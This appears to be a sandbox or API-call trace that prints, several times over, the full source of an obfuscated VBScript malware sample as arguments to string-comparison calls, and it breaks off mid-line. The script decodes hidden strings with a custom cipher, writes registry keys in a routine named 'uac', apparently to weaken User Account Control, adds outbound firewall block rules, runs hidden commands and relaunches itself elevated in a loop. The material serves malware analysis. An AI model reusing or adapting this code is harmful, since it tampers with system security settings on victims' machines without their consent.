bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0222.924] wcsncmp (_String1="dfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 87 [0222.925] wcsncmp (_String1="fheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 89 [0222.925] wcsncmp (_String1="heCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 91 [0222.925] wcsncmp (_String1="eCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), 